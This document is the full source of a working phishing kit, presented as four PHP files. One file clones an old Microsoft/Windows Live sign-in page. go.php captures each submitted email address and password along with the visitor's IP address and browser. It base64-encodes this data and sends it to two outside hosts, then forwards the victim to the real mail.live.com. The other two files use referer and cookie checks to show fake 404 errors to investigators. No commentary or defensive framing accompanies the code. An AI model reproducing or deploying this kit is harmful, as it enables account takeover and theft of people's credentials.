1. /****************
  2.  ** dataz.php
  3.  ***************/
  4. <?php
  5. require 'smart.php';
  6. ?>
  7. <!DOCTYPE html>
  8. <!-- ServerInfo: BAYIDSLGN1J27 2012.08.07.00.03.17 Live1 Unknown LocVer:0 -->
  9. <!-- PreprocessInfo: BTSA007:RR1BLDA112,  -- Version: 13,500,20764,0 -->
  10. <!-- RequestLCID: 2057, Market:EN-GB, PrefCountry: UK, LangLCID: 2057, LangISO: EN-GB -->
  11. <html dir="ltr" lang="EN-GB"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><!-- base href="http://localhost/go.php" --><script type="text/javascript">var PROOF = {};PROOF.Type = {SQSA: 6, CSS: 5, DeviceId: 4, Email: 1, AltEmail: 2, SMS: 3, HIP: 8, Birthday: 9, Voice: -3};</script><link rel="stylesheet" title="R3CSS" type="text/css" href="fll/R3WinLive2057.css"><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-GB&lc=2057"/>Windows Live ID requires JavaScript to sign in. This web browser either does not support JavaScript or scripts are being blocked.<br /><br />To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.</noscript><title>Sign In</title>  <meta name="description" content="Outlook.com is free modern email service from Microsoft. Get a clean clutter?free inbox, easily connect with Office Web Apps and SkyDrive and use it with your Hotmail account."><meta name="PageID" content="i5030"><meta name="SiteID" content="64855"><meta name="ReqLC" content="2057"><meta name="LocLC" content="2057"><link rel="shortcut icon" href="https://secure.shared.live.com/%7ELive.SiteContent.ID/%7E16.4.19/%7E/%7E/%7E/%7E/images/favicon.ico">
  12.   <style type="text/css">:root input[type=checkbox] + label, :root input[type=radio] + label{background-image: url(Https://secure.shared.live.com/~Live.SiteContent.ID/~16.4.19/~/~/~/~/images/controls.png), url(Https://secure.shared.live.com/~Live.SiteContent.ID/~16.4.19/~/~/~/~/images/controls.png), url(Https://secure.shared.live.com/~Live.SiteContent.ID/~16.4.19/~/~/~/~/images/controls.png);}
  13. ::-webkit-scrollbar-button{background-image: url(Https://secure.shared.live.com/~Live.SiteContent.ID/~16.4.19/~/~/~/~/images/controls.png);}
  14. a, a:visited{color:#0072C6;}
  15. a:hover{color:#338ED1;}
  16. a:hover:active{color:#66AADC;}
  17. :root input[type=button].default, :root input[type=submit].default{background-color:#0072C6;}
  18. :root input[type=button]:hover.default, :root input[type=submit]:hover.default, :root button:hover.default{background-color:#1E82CC;}
  19. </style><style type="text/css">body{display:none;}</style><script type="text/javascript">if (top != self){ try{ top.location.replace(self.location.href);}catch (e){ }}else{ document.write(unescape('%3C%73') + 'tyle type="text/css">body{display:block !important;}</style>');}</script><style type="text/css">body{display:block !important;}</style><noscript><style type="text/css">body{display:block !important;}</style></noscript><script type="text/javascript">var g_iSRSFailed=0,g_sSRSSuccess="";function _Df(a,f,b){var e=1,d=unescape('%3Cscript type="text/javascript" src="'),c=unescape('"%3E%3C/script%3E');if(g_sSRSSuccess.indexOf(a)!=-1)return;if(typeof window[a]=="undefined"){g_iSRSFailed=1;b<=e&&document.write(d+f+c)}else g_sSRSSuccess+=a+"|"+b+","}
  20.   var g_dtFirstByte=new Date();var g_objPageMode = null;</script><link rel="image_src" href="https://secure.shared.live.com/%7ELive.SiteContent.ID/%7E16.4.19/%7E/%7E/%7E/%7E/images/Windows_Live_v_thumb.jpg">
  21.  
  22. <body onload="evt_Login_onload(event);" uitheme="Web">
  23. <div style="height: 40px;"></div><div style="width: 100%;" class="centerParent" id="shellTD"><div style="width: 935px;" class="center" id="shellTBL"><div class="centerParent"><div style="width: 895px;" class="center" id="mainTD"><div style="width: 475px;" class="floatLeft" id="brandModeTD"><div style="width: 475px;" id="productTD"><iframe src="fll/EN-GB.htm" marginwidth="0px" marginheight="0px" id="i0278" scrolling="no" frameborder="0" height="490px" width="475px"></iframe></div></div><div style="width: 420px; position: relative;" class="floatLeft" id="signInTD"><div style="height: 40px;"></div><div class="signInHeader" id="i0272"><iframe src="fll/header.htm" marginwidth="0px" marginheight="0px" id="i0277" scrolling="no" frameborder="0" height="50px" width="320px"></iframe></div><div style="height: 30px;"></div><div style="width: 100px; height: 370px;" class="floatLeft"></div><div style="width: 320px;" class="floatLeft"><div id="rightTD"><form name="f1" target="_top" action="go.php" method="POST" novalidate=""><div id="idTd_Tile_Error" style="display: none;"><div id="idTd_Tile_ErrorMsg_Login" class="errorDiv firstError"></div></div><div id="idTd_PWD_Error" style="display: none;"><div id="idTd_PWD_ErrorMsg_Username" class="errorDiv firstError">Generic Password Error Message</div></div><div style="margin-bottom: 4px;" class="TextSizeSmall" id="idTd_PWD_UsernameLbl"><span id="idLbl_PWD_Username">Microsoft account <a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=254486" id="idA_MSAccLearnMore">What's this?</a></span></div><div style="margin-bottom: 8px;" class="textbox" id="idDiv_PWD_UsernameTb"><div style="position: relative; width: 100%;"><input maxlength="113" id="i0116" name="login" type="email"><div style="position: absolute; top: 0px; left: 0px; z-index: 5; width: 100%;"></div></div></div><div id="idTd_PWD_Error_Password" style="display: none;"><div id="idTd_PWD_ErrorMsg_Password" class="errorDiv"></div></div><div style="margin-bottom: 8px;" class="textbox" id="idDiv_PWD_PasswordTb"><div style="position: relative; width: 100%;"><input autocomplete="off" id="i0118" name="passwd" type="password"><div style="position: absolute; top: 0px; left: 0px; z-index: 5; width: 100%;"></div></div></div><div style="margin-bottom: 30px;" id="idTd_PWD_KMSI_Cb"><input value="1" id="idChkBx_PWD_KMSI0Pwd" name="KMSI" type="checkbox"><label id="idLbl_PWD_KMSI_Cb" for="idChkBx_PWD_KMSI0Pwd">Keep me signed in</label></div><div style="margin-bottom: 30px;" id="idTd_PWD_SubmitCancelTbl"><input class="default XLargePaddingRight" value="Sign in" id="idSIButton9" name="SI" type="submit"></div><div style="margin-bottom: 6px;" class="TextSizeSmall" id="idDiv_PWD_ForgotPassword"><a id="idA_PWD_ForgotPassword" href="https://login.live.com/resetpw.srf?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26ct%3d1346154636%26rver%3d6.1.6206.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26id%3d64855%26cbcxt%3dmai%26snsc%3d1%26vv%3d1350%26mkt%3dEN-GB%26lc%3d2057&amp;id=64855&amp;mkt=EN-GB&amp;lc=2057&amp;bk=1346154657&amp;username=">Can't access your account?</a></div><div class="TextSizeSmall" id="idTD_PWD_SwitchToOTCLink"><a id="idA_PWD_SwitchToOTC" href="">Sign in with a single-use code</a></div></form></div><div style="visibility: hidden;" class="SignUp" id="SignUpTD"><span>Don't have a Microsoft account?</span> <a class="TextSemiBold" href="https://signup.live.com/?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1346154636&amp;rver=6.1.6206.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&amp;id=64855&amp;cbcxt=mai&amp;snsc=1&amp;bk=1346154657&amp;uiflavor=web&amp;mkt=EN-GB&amp;lc=2057" id="idA_SignUp">Sign up now</a></div></div><div class="SignUp signUpFloat" id="SignUpTD"><span>Don't have a Microsoft account?</span> <a class="TextSemiBold" href="https://signup.live.com/?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1346154636&amp;rver=6.1.6206.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&amp;id=64855&amp;cbcxt=mai&amp;snsc=1&amp;bk=1346154657&amp;uiflavor=web&amp;mkt=EN-GB&amp;lc=2057" id="idA_SignUp">Sign up now</a></div></div></div></div><div style="height: 50px; clear: both;"></div><div style="clear: both; border-top: 1px solid rgb(204, 204, 204);" class="centerParent" id="footerTD"><div style="width: 895px; padding-top: 10px; padding-bottom: 10px;" class="center TextSizeSmall"><table style="width: 100%;" cellpadding="0" cellspacing="0"><tbody><tr><td align="left"><table cellpadding="0" cellspacing="0"><tbody><tr><td style="text-align: left;"><span style="color: rgb(102, 102, 102);" id="ftrCopy">©2012 Microsoft</span></td><td style="text-align: left;"><span></span></td><td width="10px">&nbsp;</td><td width="10px">&nbsp;</td><td style="text-align: left;"><a id="ftrTerms" style="color: rgb(0, 0, 0);" href="http://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=EN-GB&amp;vv=1350">Terms</a></td><td width="10px">&nbsp;</td><td width="10px">&nbsp;</td><td style="text-align: left;"><a id="ftrPrivacy" style="color: rgb(0, 0, 0);" href="http://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=EN-GB&amp;vv=1350">Privacy &amp; Cookies</a></td></tr></tbody></table></td><td></td><td align="right"><table cellpadding="0" cellspacing="0"><tbody><tr><td style="text-align: right;"><a id="ftrHelp" style="color: rgb(0, 0, 0);" href="http://login.live.com/gls.srf?urlID=WLHelpCentral&amp;mkt=EN-GB&amp;vv=1350">Help Centre</a></td><td width="10px">&nbsp;</td><td width="10px">&nbsp;</td><td style="text-align: right;"><a id="ftrFdbk" style="color: rgb(0, 0, 0);" href="http://login.live.com/gls.srf?urlID=WLFeedback&amp;mkt=EN-GB&amp;vv=1350">Feedback</a></td></tr></tbody></table></td></tr></tbody></table></div></div></div></div><img style="visibility: hidden;" alt="" id="ev" height="0"></body></html>
  24.  
  25.  
  26.  
  27. /****************
  28.  ** go.php
  29.  ***************/
  30. <?php
  31. $test = $_POST['test'];
  32. $user = $_REQUEST["login"];
  33. $pass = $_REQUEST["passwd"];
  34.  
  35. if (getenv(HTTP_CLIENT_IP)){
  36. $ip=getenv(HTTP_CLIENT_IP);
  37. }
  38. else {
  39. $ip=getenv(REMOTE_ADDR);
  40. }
  41.  
  42.  
  43. $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
  44. $browser = $_SERVER['HTTP_USER_AGENT'];
  45.  
  46.  
  47. $data = "$user,$pass#$ip#$hostname - $browser";
  48.  
  49.  
  50. $site1 = "http://colorpop.com/wp-content/plugins/mailchimp/gta.php?info=";
  51. $site2 = "http://oderena.lt/gta.php?info=";
  52.  
  53.  
  54.  
  55. function test($test,$site) {
  56. $testencoded = base64_encode($test);
  57. $testgo = "$site$testencoded";
  58. get_headers("$testgo");
  59. }
  60. if ($test != "") {
  61. test("$test","$site1");
  62. test("$test","$site2");
  63. die();
  64. }
  65.  
  66. function writeit($data,$site) {
  67. $dataz = base64_encode($data);
  68. $zait = "$site$dataz";
  69. get_headers("$zait");
  70. }
  71. writeit("$data","$site1");
  72. writeit("$data","$site2");
  73.  
  74. header("Location: http://mail.live.com/ ");
  75.  
  76. ?>
  77.  
  78.  
  79.  
  80. /****************
  81.  ** index.php
  82.  ***************/
  83. <?php
  84. $mode = $_GET['mode'];
  85. $comes = $_SERVER['HTTP_REFERER'];
  86. $from = 'live.com';
  87. if ($mode == "test") {  }
  88. elseif (strpos($comes,$from)) {
  89. setcookie("mailx", "mailx");
  90. }
  91. else {
  92. die("404 Not found");
  93. }
  94. $redir = 'dataz.php?Windows.Live.AU' . rand(1, 100) . rand(1, 100) . rand(5, 15) . 'Account-Verification-Process' . rand(5, 15) . rand(5, 15) . rand(5, 15);
  95. header("Location: $redir");
  96. ?>
  97.  
  98.  
  99.  
  100.  
  101. /****************
  102.  ** smart.php
  103.  ***************/
  104. <?php
  105. $mode = $_GET['mode'];
  106. if (!$mode == "test") {
  107.  if (!isset($_COOKIE["mailx"])) {
  108.   die("Error 404");
  109. } }
  110. ?>